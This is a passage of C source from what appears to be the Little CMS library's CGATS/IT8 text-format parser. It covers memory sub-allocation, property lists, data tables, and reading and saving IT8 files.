return NULL;
}
ptr1-> Ptr = ptr;
ptr1-> Next = it8 -> MemorySink;
it8 -> MemorySink = ptr1;
}
return ptr;
}
// Suballocator.
static
void* AllocChunk(cmsIT8* it8, cmsUInt32Number size)
{
cmsUInt32Number Free = it8 ->Allocator.BlockSize - it8 ->Allocator.Used;
cmsUInt8Number* ptr;
size = _cmsALIGNMEM(size);
if (size > Free) {
if (it8 -> Allocator.BlockSize == 0)
it8 -> Allocator.BlockSize = 20*1024;
else
it8 ->Allocator.BlockSize *= 2;
if (it8 ->Allocator.BlockSize < size)
it8 ->Allocator.BlockSize = size;
it8 ->Allocator.Used = 0;
it8 ->Allocator.Block = (cmsUInt8Number*) AllocBigBlock(it8, it8 ->Allocator.BlockSize);
}
ptr = it8 ->Allocator.Block + it8 ->Allocator.Used;
it8 ->Allocator.Used += size;
return (void*) ptr;
}
// Allocates a string
static
char *AllocString(cmsIT8* it8, const char* str)
{
cmsUInt32Number Size = (cmsUInt32Number) strlen(str)+1;
char *ptr;
ptr = (char *) AllocChunk(it8, Size);
if (ptr) strncpy (ptr, str, Size-1);
return ptr;
}
// Searches through linked list
static
cmsBool IsAvailableOnList(KEYVALUE* p, const char* Key, const char* Subkey, KEYVALUE** LastPtr)
{
if (LastPtr) *LastPtr = p;
for (; p != NULL; p = p->Next) {
if (LastPtr) *LastPtr = p;
if (*Key != '#') { // Comments are ignored
if (cmsstrcasecmp(Key, p->Keyword) == 0)
break;
}
}
if (p == NULL)
return FALSE;
if (Subkey == 0)
return TRUE;
for (; p != NULL; p = p->NextSubkey) {
if (p ->Subkey == NULL) continue;
if (LastPtr) *LastPtr = p;
if (cmsstrcasecmp(Subkey, p->Subkey) == 0)
return TRUE;
}
return FALSE;
}
// Add a property into a linked list
static
KEYVALUE* AddToList(cmsIT8* it8, KEYVALUE** Head, const char *Key, const char *Subkey, const char* xValue, WRITEMODE WriteAs)
{
KEYVALUE* p;
KEYVALUE* last;
// Check if property is already in list
if (IsAvailableOnList(*Head, Key, Subkey, &p)) {
// This may work for editing properties
// return SynError(it8, "duplicate key <%s>", Key);
}
else {
last = p;
// Allocate the container
p = (KEYVALUE*) AllocChunk(it8, sizeof(KEYVALUE));
if (p == NULL)
{
SynError(it8, "AddToList: out of memory");
return NULL;
}
// Store name and value
p->Keyword = AllocString(it8, Key);
p->Subkey = (Subkey == NULL) ? NULL : AllocString(it8, Subkey);
// Keep the container in our list
if (*Head == NULL) {
*Head = p;
}
else
{
if (Subkey != NULL && last != NULL) {
last->NextSubkey = p;
// If Subkey is not null, then last is the last property with the same key,
// but not necessarily is the last property in the list, so we need to move
// to the actual list end
while (last->Next != NULL)
last = last->Next;
}
if (last != NULL) last->Next = p;
}
p->Next = NULL;
p->NextSubkey = NULL;
}
p->WriteAs = WriteAs;
if (xValue != NULL) {
p->Value = AllocString(it8, xValue);
}
else {
p->Value = NULL;
}
return p;
}
static
KEYVALUE* AddAvailableProperty(cmsIT8* it8, const char* Key, WRITEMODE as)
{
return AddToList(it8, &it8->ValidKeywords, Key, NULL, NULL, as);
}
static
KEYVALUE* AddAvailableSampleID(cmsIT8* it8, const char* Key)
{
return AddToList(it8, &it8->ValidSampleID, Key, NULL, NULL, WRITE_UNCOOKED);
}
static
void AllocTable(cmsIT8* it8)
{
TABLE* t;
t = it8 ->Tab + it8 ->TablesCount;
t->HeaderList = NULL;
t->DataFormat = NULL;
t->Data = NULL;
it8 ->TablesCount++;
}
cmsInt32Number CMSEXPORT cmsIT8SetTable(cmsHANDLE IT8, cmsUInt32Number nTable)
{
cmsIT8* it8 = (cmsIT8*) IT8;
if (nTable >= it8 ->TablesCount) {
if (nTable == it8 ->TablesCount) {
AllocTable(it8);
}
else {
SynError(it8, "Table %d is out of sequence", nTable);
return -1;
}
}
it8 ->nTable = nTable;
return (cmsInt32Number) nTable;
}
// Init an empty container
cmsHANDLE CMSEXPORT cmsIT8Alloc(cmsContext ContextID)
{
cmsIT8* it8;
cmsUInt32Number i;
it8 = (cmsIT8*) _cmsMallocZero(ContextID, sizeof(cmsIT8));
if (it8 == NULL) return NULL;
AllocTable(it8);
it8->MemoryBlock = NULL;
it8->MemorySink = NULL;
it8 ->nTable = 0;
it8->ContextID = ContextID;
it8->Allocator.Used = 0;
it8->Allocator.Block = NULL;
it8->Allocator.BlockSize = 0;
it8->ValidKeywords = NULL;
it8->ValidSampleID = NULL;
it8 -> sy = SUNDEFINED;
it8 -> ch = ' ';
it8 -> Source = NULL;
it8 -> inum = 0;
it8 -> dnum = 0.0;
it8->FileStack[0] = (FILECTX*)AllocChunk(it8, sizeof(FILECTX));
it8->IncludeSP = 0;
it8 -> lineno = 1;
strcpy(it8->DoubleFormatter, DEFAULT_DBL_FORMAT);
cmsIT8SetSheetType((cmsHANDLE) it8, "CGATS.17");
// Initialize predefined properties & data
for (i=0; i < NUMPREDEFINEDPROPS; i++)
AddAvailableProperty(it8, PredefinedProperties[i].id, PredefinedProperties[i].as);
for (i=0; i < NUMPREDEFINEDSAMPLEID; i++)
AddAvailableSampleID(it8, PredefinedSampleID[i]);
return (cmsHANDLE) it8;
}
const char* CMSEXPORT cmsIT8GetSheetType(cmsHANDLE hIT8)
{
return GetTable((cmsIT8*) hIT8)->SheetType;
}
cmsBool CMSEXPORT cmsIT8SetSheetType(cmsHANDLE hIT8, const char* Type)
{
TABLE* t = GetTable((cmsIT8*) hIT8);
strncpy(t ->SheetType, Type, MAXSTR-1);
t ->SheetType[MAXSTR-1] = 0;
return TRUE;
}
cmsBool CMSEXPORT cmsIT8SetComment(cmsHANDLE hIT8, const char* Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
if (!Val) return FALSE;
if (!*Val) return FALSE;
return AddToList(it8, &GetTable(it8)->HeaderList, "# ", NULL, Val, WRITE_UNCOOKED) != NULL;
}
// Sets a property
cmsBool CMSEXPORT cmsIT8SetPropertyStr(cmsHANDLE hIT8, const char* Key, const char *Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
if (!Val) return FALSE;
if (!*Val) return FALSE;
return AddToList(it8, &GetTable(it8)->HeaderList, Key, NULL, Val, WRITE_STRINGIFY) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyDbl(cmsHANDLE hIT8, const char* cProp, cmsFloat64Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buffer[1024];
snprintf(Buffer, 1023, it8->DoubleFormatter, Val);
return AddToList(it8, &GetTable(it8)->HeaderList, cProp, NULL, Buffer, WRITE_UNCOOKED) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyHex(cmsHANDLE hIT8, const char* cProp, cmsUInt32Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buffer[1024];
snprintf(Buffer, 1023, "%u", Val);
return AddToList(it8, &GetTable(it8)->HeaderList, cProp, NULL, Buffer, WRITE_HEXADECIMAL) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyUncooked(cmsHANDLE hIT8, const char* Key, const char* Buffer)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
return AddToList(it8, &GetTable(it8)->HeaderList, Key, NULL, Buffer, WRITE_UNCOOKED) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyMulti(cmsHANDLE hIT8, const char* Key, const char* SubKey, const char *Buffer)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
return AddToList(it8, &GetTable(it8)->HeaderList, Key, SubKey, Buffer, WRITE_PAIR) != NULL;
}
// Gets a property
const char* CMSEXPORT cmsIT8GetProperty(cmsHANDLE hIT8, const char* Key)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE* p;
if (IsAvailableOnList(GetTable(it8) -> HeaderList, Key, NULL, &p))
{
return p -> Value;
}
return NULL;
}
cmsFloat64Number CMSEXPORT cmsIT8GetPropertyDbl(cmsHANDLE hIT8, const char* cProp)
{
const char *v = cmsIT8GetProperty(hIT8, cProp);
if (v == NULL) return 0.0;
return ParseFloatNumber(v);
}
const char* CMSEXPORT cmsIT8GetPropertyMulti(cmsHANDLE hIT8, const char* Key, const char *SubKey)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE* p;
if (IsAvailableOnList(GetTable(it8) -> HeaderList, Key, SubKey, &p)) {
return p -> Value;
}
return NULL;
}
// ----------------------------------------------------------------- Datasets
static
void AllocateDataFormat(cmsIT8* it8)
{
TABLE* t = GetTable(it8);
if (t -> DataFormat) return; // Already allocated
t -> nSamples = (int) cmsIT8GetPropertyDbl(it8, "NUMBER_OF_FIELDS");
if (t -> nSamples <= 0) {
SynError(it8, "AllocateDataFormat: Unknown NUMBER_OF_FIELDS");
t -> nSamples = 10;
}
t -> DataFormat = (char**) AllocChunk (it8, ((cmsUInt32Number) t->nSamples + 1) * sizeof(char *));
if (t->DataFormat == NULL) {
SynError(it8, "AllocateDataFormat: Unable to allocate dataFormat array");
}
}
static
const char *GetDataFormat(cmsIT8* it8, int n)
{
TABLE* t = GetTable(it8);
if (t->DataFormat)
return t->DataFormat[n];
return NULL;
}
static
cmsBool SetDataFormat(cmsIT8* it8, int n, const char *label)
{
TABLE* t = GetTable(it8);
if (!t->DataFormat)
AllocateDataFormat(it8);
if (n > t -> nSamples) {
SynError(it8, "More than NUMBER_OF_FIELDS fields.");
return FALSE;
}
if (t->DataFormat) {
t->DataFormat[n] = AllocString(it8, label);
}
return TRUE;
}
cmsBool CMSEXPORT cmsIT8SetDataFormat(cmsHANDLE h, int n, const char *Sample)
{
cmsIT8* it8 = (cmsIT8*)h;
return SetDataFormat(it8, n, Sample);
}
static
void AllocateDataSet(cmsIT8* it8)
{
TABLE* t = GetTable(it8);
if (t -> Data) return; // Already allocated
t-> nSamples = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_FIELDS"));
t-> nPatches = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_SETS"));
t-> Data = (char**)AllocChunk (it8, ((cmsUInt32Number) t->nSamples + 1) * ((cmsUInt32Number) t->nPatches + 1) *sizeof (char*));
if (t->Data == NULL) {
SynError(it8, "AllocateDataSet: Unable to allocate data array");
}
}
static
char* GetData(cmsIT8* it8, int nSet, int nField)
{
TABLE* t = GetTable(it8);
int nSamples = t -> nSamples;
int nPatches = t -> nPatches;
if (nSet >= nPatches || nField >= nSamples)
return NULL;
if (!t->Data) return NULL;
return t->Data [nSet * nSamples + nField];
}
static
cmsBool SetData(cmsIT8* it8, int nSet, int nField, const char *Val)
{
TABLE* t = GetTable(it8);
if (!t->Data)
AllocateDataSet(it8);
if (!t->Data) return FALSE;
if (nSet > t -> nPatches || nSet < 0) {
return SynError(it8, "Patch %d out of range, there are %d patches", nSet, t -> nPatches);
}
if (nField > t ->nSamples || nField < 0) {
return SynError(it8, "Sample %d out of range, there are %d samples", nField, t ->nSamples);
}
t->Data [nSet * t -> nSamples + nField] = AllocString(it8, Val);
return TRUE;
}
// --------------------------------------------------------------- File I/O
// Writes a string to file
static
void WriteStr(SAVESTREAM* f, const char *str)
{
cmsUInt32Number len;
if (str == NULL)
str = " ";
// Length to write
len = (cmsUInt32Number) strlen(str);
f ->Used += len;
if (f ->stream) { // Should I write it to a file?
if (fwrite(str, 1, len, f->stream) != len) {
cmsSignalError(0, cmsERROR_WRITE, "Write to file error in CGATS parser");
return;
}
}
else { // Or to a memory block?
if (f ->Base) { // Am I just counting the bytes?
if (f ->Used > f ->Max) {
cmsSignalError(0, cmsERROR_WRITE, "Write to memory overflows in CGATS parser");
return;
}
memmove(f ->Ptr, str, len);
f->Ptr += len;
}
}
}
// Write formatted
static
void Writef(SAVESTREAM* f, const char* frm, ...)
{
char Buffer[4096];
va_list args;
va_start(args, frm);
vsnprintf(Buffer, 4095, frm, args);
Buffer[4095] = 0;
WriteStr(f, Buffer);
va_end(args);
}
// Writes full header
static
void WriteHeader(cmsIT8* it8, SAVESTREAM* fp)
{
KEYVALUE* p;
TABLE* t = GetTable(it8);
// Writes the type
WriteStr(fp, t->SheetType);
WriteStr(fp, "\n");
for (p = t->HeaderList; (p != NULL); p = p->Next)
{
if (*p ->Keyword == '#') {
char* Pt;
WriteStr(fp, "#\n# ");
for (Pt = p ->Value; *Pt; Pt++) {
Writef(fp, "%c", *Pt);
if (*Pt == '\n') {
WriteStr(fp, "# ");
}
}
WriteStr(fp, "\n#\n");
continue;
}
if (!IsAvailableOnList(it8-> ValidKeywords, p->Keyword, NULL, NULL)) {
#ifdef CMS_STRICT_CGATS
WriteStr(fp, "KEYWORD\t\"");
WriteStr(fp, p->Keyword);
WriteStr(fp, "\"\n");
#endif
AddAvailableProperty(it8, p->Keyword, WRITE_UNCOOKED);
}
WriteStr(fp, p->Keyword);
if (p->Value) {
switch (p ->WriteAs) {
case WRITE_UNCOOKED:
Writef(fp, "\t%s", p ->Value);
break;
case WRITE_STRINGIFY:
Writef(fp, "\t\"%s\"", p->Value );
break;
case WRITE_HEXADECIMAL:
Writef(fp, "\t0x%X", atoi(p ->Value));
break;
case WRITE_BINARY:
Writef(fp, "\t0x%B", atoi(p ->Value));
break;
case WRITE_PAIR:
Writef(fp, "\t\"%s,%s\"", p->Subkey, p->Value);
break;
default: SynError(it8, "Unknown write mode %d", p ->WriteAs);
return;
}
}
WriteStr (fp, "\n");
}
}
// Writes the data format
static
void WriteDataFormat(SAVESTREAM* fp, cmsIT8* it8)
{
int i, nSamples;
TABLE* t = GetTable(it8);
if (!t -> DataFormat) return;
WriteStr(fp, "BEGIN_DATA_FORMAT\n");
WriteStr(fp, " ");
nSamples = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_FIELDS"));
for (i = 0; i < nSamples; i++) {
WriteStr(fp, t->DataFormat[i]);
WriteStr(fp, ((i == (nSamples-1)) ? "\n" : "\t"));
}
WriteStr (fp, "END_DATA_FORMAT\n");
}
// Writes data array
static
void WriteData(SAVESTREAM* fp, cmsIT8* it8)
{
int i, j;
TABLE* t = GetTable(it8);
if (!t->Data) return;
WriteStr (fp, "BEGIN_DATA\n");
t->nPatches = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_SETS"));
for (i = 0; i < t-> nPatches; i++) {
WriteStr(fp, " ");
for (j = 0; j < t->nSamples; j++) {
char *ptr = t->Data[i*t->nSamples+j];
if (ptr == NULL) WriteStr(fp, "\"\"");
else {
// If value contains whitespace, enclose within quote
if (strchr(ptr, ' ') != NULL) {
WriteStr(fp, "\"");
WriteStr(fp, ptr);
WriteStr(fp, "\"");
}
else
WriteStr(fp, ptr);
}
WriteStr(fp, ((j == (t->nSamples-1)) ? "\n" : "\t"));
}
}
WriteStr (fp, "END_DATA\n");
}
// Saves whole file
cmsBool CMSEXPORT cmsIT8SaveToFile(cmsHANDLE hIT8, const char* cFileName)
{
SAVESTREAM sd;
cmsUInt32Number i;
cmsIT8* it8 = (cmsIT8*) hIT8;
memset(&sd, 0, sizeof(sd));
sd.stream = fopen(cFileName, "wt");
if (!sd.stream) return FALSE;
for (i=0; i < it8 ->TablesCount; i++) {
cmsIT8SetTable(hIT8, i);
WriteHeader(it8, &sd);
WriteDataFormat(&sd, it8);
WriteData(&sd, it8);
}
if (fclose(sd.stream) != 0) return FALSE;
return TRUE;
}
// Saves to memory
cmsBool CMSEXPORT cmsIT8SaveToMem(cmsHANDLE hIT8, void *MemPtr, cmsUInt32Number* BytesNeeded)
{
SAVESTREAM sd;
cmsUInt32Number i;
cmsIT8* it8 = (cmsIT8*) hIT8;
memset(&sd, 0, sizeof(sd));
sd.stream = NULL;
sd.Base = (cmsUInt8Number*) MemPtr;
sd.Ptr = sd.Base;
sd.Used = 0;
if (sd.Base)
sd.Max = *BytesNeeded; // Write to memory?
else
sd.Max = 0; // Just counting the needed bytes
for (i=0; i < it8 ->TablesCount; i++) {
cmsIT8SetTable(hIT8, i);
WriteHeader(it8, &sd);
WriteDataFormat(&sd, it8);
WriteData(&sd, it8);
}
sd.Used++; // The \0 at the very end
if (sd.Base)
*sd.Ptr = 0;
*BytesNeeded = sd.Used;
return TRUE;
}
// -------------------------------------------------------------- Higher level parsing
static
cmsBool DataFormatSection(cmsIT8* it8)
{
int iField = 0;
TABLE* t = GetTable(it8);
InSymbol(it8); // Eats "BEGIN_DATA_FORMAT"
CheckEOLN(it8);
while (it8->sy != SEND_DATA_FORMAT &&
it8->sy != SEOLN &&
it8->sy != SEOF &&
it8->sy != SSYNERROR) {
if (it8->sy != SIDENT) {
return SynError(it8, "Sample type expected");
}
if (!SetDataFormat(it8, iField, it8->id)) return FALSE;
iField++;
InSymbol(it8);
SkipEOLN(it8);
}
SkipEOLN(it8);
Skip(it8, SEND_DATA_FORMAT);
SkipEOLN(it8);
if (iField != t ->nSamples) {
SynError(it8, "Count mismatch. NUMBER_OF_FIELDS was %d, found %d\n", t ->nSamples, iField);
}
return TRUE;
}
static
cmsBool DataSection (cmsIT8* it8)
{
int iField = 0;
int iSet = 0;
char Buffer[256];
TABLE* t = GetTable(it8);
InSymbol(it8); // Eats "BEGIN_DATA"
CheckEOLN(it8);
if (!t->Data)
AllocateDataSet(it8);
while (it8->sy != SEND_DATA && it8->sy != SEOF)
{
if (iField >= t -> nSamples) {
iField = 0;
iSet++;
}
if (it8->sy != SEND_DATA && it8->sy != SEOF) {
if (!GetVal(it8, Buffer, 255, "Sample data expected"))
return FALSE;
if (!SetData(it8, iSet, iField, Buffer))
return FALSE;
iField++;
InSymbol(it8);
SkipEOLN(it8);
}
}
SkipEOLN(it8);
Skip(it8, SEND_DATA);
SkipEOLN(it8);
// Check for data completion.
if ((iSet+1) != t -> nPatches)
return SynError(it8, "Count mismatch. NUMBER_OF_SETS was %d, found %d\n", t ->nPatches, iSet+1);
return TRUE;
}
static
cmsBool HeaderSection(cmsIT8* it8)
{
char VarName[MAXID];
char Buffer[MAXSTR];
KEYVALUE* Key;
while (it8->sy != SEOF &&
it8->sy != SSYNERROR &&
it8->sy != SBEGIN_DATA_FORMAT &&
it8->sy != SBEGIN_DATA) {
switch (it8 -> sy) {
case SKEYWORD:
InSymbol(it8);
if (!GetVal(it8, Buffer, MAXSTR-1, "Keyword expected")) return FALSE;
if (!AddAvailableProperty(it8, Buffer, WRITE_UNCOOKED)) return FALSE;
InSymbol(it8);
break;
case SDATA_FORMAT_ID:
InSymbol(it8);
if (!GetVal(it8, Buffer, MAXSTR-1, "Keyword expected")) return FALSE;
if (!AddAvailableSampleID(it8, Buffer)) return FALSE;
InSymbol(it8);
break;
case SIDENT:
strncpy(VarName, it8->id, MAXID - 1);
VarName[MAXID - 1] = 0;
if (!IsAvailableOnList(it8->ValidKeywords, VarName, NULL, &Key)) {
#ifdef CMS_STRICT_CGATS
return SynError(it8, "Undefined keyword '%s'", VarName);
#else
Key = AddAvailableProperty(it8, VarName, WRITE_UNCOOKED);
if (Key == NULL) return FALSE;
#endif
}
InSymbol(it8);
if (!GetVal(it8, Buffer, MAXSTR - 1, "Property data expected")) return FALSE;
if (Key->WriteAs != WRITE_PAIR) {
AddToList(it8, &GetTable(it8)->HeaderList, VarName, NULL, Buffer,
(it8->sy == SSTRING) ? WRITE_STRINGIFY : WRITE_UNCOOKED);
}
else {
const char *Subkey;
char *Nextkey;
if (it8->sy != SSTRING)
return SynError(it8, "Invalid value '%s' for property '%s'.", Buffer, VarName);
// chop the string as a list of "subkey, value" pairs, using ';' as a separator
for (Subkey = Buffer; Subkey != NULL; Subkey = Nextkey)
{
char *Value, *temp;
// identify token pair boundary
Nextkey = (char*)strchr(Subkey, ';');
if (Nextkey)
*Nextkey++ = '\0';
// for each pair, split the subkey and the value
Value = (char*)strrchr(Subkey, ',');
if (Value == NULL)
return SynError(it8, "Invalid value for property '%s'.", VarName);
// gobble the spaces before the coma, and the coma itself
temp = Value++;
do *temp-- = '\0'; while (temp >= Subkey && *temp == ' ');
// gobble any space at the right
temp = Value + strlen(Value) - 1;
while (*temp == ' ') *temp-- = '\0';
// trim the strings from the left
Subkey += strspn(Subkey, " ");
Value += strspn(Value, " ");
if (Subkey[0] == 0 || Value[0] == 0)
return SynError(it8, "Invalid value for property '%s'.", VarName);
AddToList(it8, &GetTable(it8)->HeaderList, VarName, Subkey, Value, WRITE_PAIR);
}
}
InSymbol(it8);
break;
case SEOLN: break;
default:
return SynError(it8, "expected keyword or identifier");
}
SkipEOLN(it8);
}
return TRUE;
}
static
void ReadType(cmsIT8* it8, char* SheetTypePtr)
{
cmsInt32Number cnt = 0;
// First line is a very special case.
while (isseparator(it8->ch))
NextCh(it8);
while (it8->ch != '\r' && it8 ->ch != '\n' && it8->ch != '\t' && it8 -> ch != 0) {
if (cnt++ < MAXSTR)
*SheetTypePtr++= (char) it8 ->ch;
NextCh(it8);
}
*SheetTypePtr = 0;
}
static
cmsBool ParseIT8(cmsIT8* it8, cmsBool nosheet)
{
char* SheetTypePtr = it8 ->Tab[0].SheetType;
if (nosheet == 0) {
ReadType(it8, SheetTypePtr);
}
InSymbol(it8);
SkipEOLN(it8);
while (it8-> sy != SEOF &&
it8-> sy != SSYNERROR) {
switch (it8 -> sy) {
case SBEGIN_DATA_FORMAT:
if (!DataFormatSection(it8)) return FALSE;
break;
case SBEGIN_DATA:
if (!DataSection(it8)) return FALSE;
if (it8 -> sy != SEOF) {
AllocTable(it8);
it8 ->nTable = it8 ->TablesCount - 1;
// Read sheet type if present. We only support identifier and string.
// <ident> <eoln> is a type string
// anything else, is not a type string
if (nosheet == 0) {
if (it8 ->sy == SIDENT) {
// May be a type sheet or may be a prop value statement. We cannot use insymbol in
// this special case...
while (isseparator(it8->ch))
NextCh(it8);
// If a newline is found, then this is a type string
if (it8 ->ch == '\n' || it8->ch == '\r') {
cmsIT8SetSheetType(it8, it8 ->id);
InSymbol(it8);
}
else
{
// It is not. Just continue
cmsIT8SetSheetType(it8, "");
}
}
else
// Validate quoted strings
if (it8 ->sy == SSTRING) {
cmsIT8SetSheetType(it8, it8 ->str);
InSymbol(it8);
}
}
}
break;
case SEOLN:
SkipEOLN(it8);
break;
default:
if (!HeaderSection(it8)) return FALSE;
}
}
return (it8 -> sy != SSYNERROR);
}
// Init useful pointers
static
void CookPointers(cmsIT8* it8)
{
int idField, i;
char* Fld;
cmsUInt32Number j;
cmsUInt32Number nOldTable = it8 ->nTable;
for (j=0; j < it8 ->TablesCount; j++) {
TABLE* t = it8 ->Tab + j;
t -> SampleID = 0;
it8 ->nTable = j;
for (idField = 0; idField < t -> nSamples; idField++)
{
if (t ->DataFormat == NULL){
SynError(it8, "Undefined DATA_FORMAT");
return;
}
Fld = t->DataFormat[idField];
if (!Fld) continue;
if (cmsstrcasecmp(Fld, "SAMPLE_ID") == 0) {
t -> SampleID = idField;
for (i=0; i < t -> nPatches; i++) {
char *Data = GetData(it8, i, idField);
if (Data) {
char Buffer[256];
strncpy(Buffer, Data, 255);
Buffer[255] = 0;
if (strlen(Buffer) <= strlen(Data))
strcpy(Data, Buffer);
else
SetData(it8, i, idField, Buffer);
}
}
}
// "LABEL" is an extension. It keeps references to forward tables
if ((cmsstrcasecmp(Fld, "LABEL") == 0) || Fld[0] == '$' ) {
// Search for table references...
for (i=0; i < t -> nPatches; i++) {
char *Label = GetData(it8, i, idField);
if (Label) {
cmsUInt32Number k;
// This is the label, search for a table containing
// this property
for (k=0; k < it8 ->TablesCount; k++) {
TABLE* Table = it8 ->Tab + k;
KEYVALUE* p;
if (IsAvailableOnList(Table->HeaderList, Label, NULL, &p)) {
// Available, keep type and table
char Buffer[256];
char *Type = p ->Value;
int nTable = (int) k;
snprintf(Buffer, 255, "%s %d %s", Label, nTable, Type );
SetData(it8, i, idField, Buffer);
}
}
}
}
}
}
}
it8 ->nTable = nOldTable;
}
// Try to infere if the file is a CGATS/IT8 file at all. Read first line
// that should be something like some printable characters plus a \n
// returns 0 if this is not like a CGATS, or an integer otherwise. This integer is the number of words in first line?
static
int IsMyBlock(const cmsUInt8Number* Buffer, cmsUInt32Number n)
{
int words = 1, space = 0, quot = 0;
cmsUInt32Number i;
if (n < 10) return 0; // Too small
if (n > 132)
n = 132;
for (i = 1; i < n; i++) {
switch(Buffer[i])
{
case '\n':
case '\r':
return ((quot == 1) || (words > 2)) ? 0 : words;
case '\t':
case ' ':
if(!quot && !space)
space = 1;
break;
case '\"':
quot = !quot;
break;
default:
if (Buffer[i] < 32) return 0;
if (Buffer[i] > 127) return 0;
words += space;
space = 0;
break;
}
}
return 0;
}
static
cmsBool IsMyFile(const char* FileName)
{
FILE *fp;
cmsUInt32Number Size;
cmsUInt8Number Ptr[133];
fp = fopen(FileName, "rt");
if (!fp) {
cmsSignalError(0, cmsERROR_FILE, "File '%s' not found", FileName);
return FALSE;
}
Size = (cmsUInt32Number) fread(Ptr, 1, 132, fp);
if (fclose(fp) != 0)
return FALSE;
Ptr[Size] = '\0';
return IsMyBlock(Ptr, Size);
}
// ---------------------------------------------------------- Exported routines
cmsHANDLE CMSEXPORT cmsIT8LoadFromMem(cmsContext ContextID, const void *Ptr, cmsUInt32Number len)
{
cmsHANDLE hIT8;
cmsIT8* it8;
int type;
_cmsAssert(Ptr != NULL);
_cmsAssert(len != 0);
type = IsMyBlock((const cmsUInt8Number*)Ptr, len);
if (type == 0) return NULL;
hIT8 = cmsIT8Alloc(ContextID);
if (!hIT8) return NULL;
it8 = (cmsIT8*) hIT8;
it8 ->MemoryBlock = (char*) _cmsMalloc(ContextID, len + 1);
if (it8->MemoryBlock == NULL)
{
cmsIT8Free(hIT8);
return FALSE;
}
strncpy(it8 ->MemoryBlock, (const char*) Ptr, len);
it8 ->MemoryBlock[len] = 0;
strncpy(it8->FileStack[0]->FileName, "", cmsMAX_PATH-1);
it8-> Source = it8 -> MemoryBlock;
if (!ParseIT8(it8, type-1)) {
cmsIT8Free(hIT8);
return FALSE;
}
CookPointers(it8);
it8 ->nTable = 0;
_cmsFree(ContextID, it8->MemoryBlock);
it8 -> MemoryBlock = NULL;
return hIT8;
}
cmsHANDLE CMSEXPORT cmsIT8LoadFromFile(cmsContext ContextID, const char* cFileName)
{
cmsHANDLE hIT8;
cmsIT8* it8;
int type;
_cmsAssert(cFileName != NULL);
type = IsMyFile(cFileName);
if (type == 0) return NULL;
hIT8 = cmsIT8Alloc(ContextID);
it8 = (cmsIT8*) hIT8;
if (!hIT8) return NULL;
it8 ->FileStack[0]->Stream = fopen(cFileName, "rt");
if (!it8 ->FileStack[0]->Stream) {
cmsIT8Free(hIT8);
return NULL;
}
strncpy(it8->FileStack[0]->FileName, cFileName, cmsMAX_PATH-1);
it8->FileStack[0]->FileName[cmsMAX_PATH-1] = 0;
if (!ParseIT8(it8, type-1)) {
fclose(it8 ->FileStack[0]->Stream);
cmsIT8Free(hIT8);
return NULL;
}
CookPointers(it8);
it8 ->nTable = 0;
if (fclose(it8 ->FileStack[0]->Stream)!= 0) {
cmsIT8Free(hIT8);
return NULL;
}
return hIT8;
}
int CMSEXPORT cmsIT8EnumDataFormat(cmsHANDLE hIT8, char ***SampleNames)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
if (SampleNames)
*SampleNames = t -> DataFormat;
return t -> nSamples;
}
cmsUInt32Number CMSEXPORT cmsIT8EnumProperties(cmsHANDLE hIT8, char ***PropertyNames)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE* p;
cmsUInt32Number n;
char **Props;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
// Pass#1 - count properties
n = 0;
for (p = t -> HeaderList; p != NULL; p = p->Next) {
n++;
}
Props = (char **) AllocChunk(it8, sizeof(char *) * n);
// Pass#2 - Fill pointers
n = 0;
for (p = t -> HeaderList; p != NULL; p = p->Next) {
Props[n++] = p -> Keyword;
}
*PropertyNames = Props;
return n;
}
cmsUInt32Number CMSEXPORT cmsIT8EnumPropertyMulti(cmsHANDLE hIT8, const char* cProp, const char ***SubpropertyNames)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE *p, *tmp;
cmsUInt32Number n;
const char **Props;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
if(!IsAvailableOnList(t->HeaderList, cProp, NULL, &p)) {
*SubpropertyNames = 0;
return 0;
}
// Pass#1 - count properties
n = 0;
for (tmp = p; tmp != NULL; tmp = tmp->NextSubkey) {
if(tmp->Subkey != NULL)
n++;
}
Props = (const char **) AllocChunk(it8, sizeof(char *) * n);
// Pass#2 - Fill pointers
n = 0;
for (tmp = p; tmp != NULL; tmp = tmp->NextSubkey) {
if(tmp->Subkey != NULL)
Props[n++] = p ->Subkey;
}
*SubpropertyNames = Props;
return n;
}
static
int LocatePatch(cmsIT8* it8, const char* cPatch)
{
int i;
const char *data;
TABLE* t = GetTable(it8);
for (i=0; i < t-> nPatches; i++) {
data = GetData(it8, i, t->SampleID);
if (data != NULL) {
if (cmsstrcasecmp(data, cPatch) == 0)
return i;
}
}
// SynError(it8, "Couldn't find patch '%s'\n", cPatch);
return -1;
}
static
int LocateEmptyPatch(cmsIT8* it8)
{
int i;
const char *data;
TABLE* t = GetTable(it8);
for (i=0; i < t-> nPatches; i++) {
data = GetData(it8, i, t->SampleID);
if (data == NULL)
return i;
}
return -1;
}
static
int LocateSample(cmsIT8* it8, const char* cSample)
{
int i;
const char *fld;
TABLE* t = GetTable(it8);
for (i=0; i < t->nSamples; i++) {
fld = GetDataFormat(it8, i);
if (fld != NULL) {
if (cmsstrcasecmp(fld, cSample) == 0)
return i;
}
}
return -1;
}
int CMSEXPORT cmsIT8FindDataFormat(cmsHANDLE hIT8, const char* cSample)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return LocateSample(it8, cSample);
}
